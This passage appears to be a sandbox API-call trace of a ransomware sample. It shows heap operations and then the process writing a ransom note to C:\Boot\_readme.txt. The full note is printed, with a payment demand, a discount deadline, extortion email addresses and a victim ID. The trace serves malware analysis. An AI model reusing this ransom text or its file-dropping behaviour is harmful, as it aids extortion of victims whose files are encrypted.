Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.710] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.710] PathFindFileNameW (pszPath="") returned="" [0179.710] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.711] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.711] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.711] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.711] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0179.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.711] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0179.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ade6e0 [0179.712] lstrcpyW (in: lpString1=0x2ade6e0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.712] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail 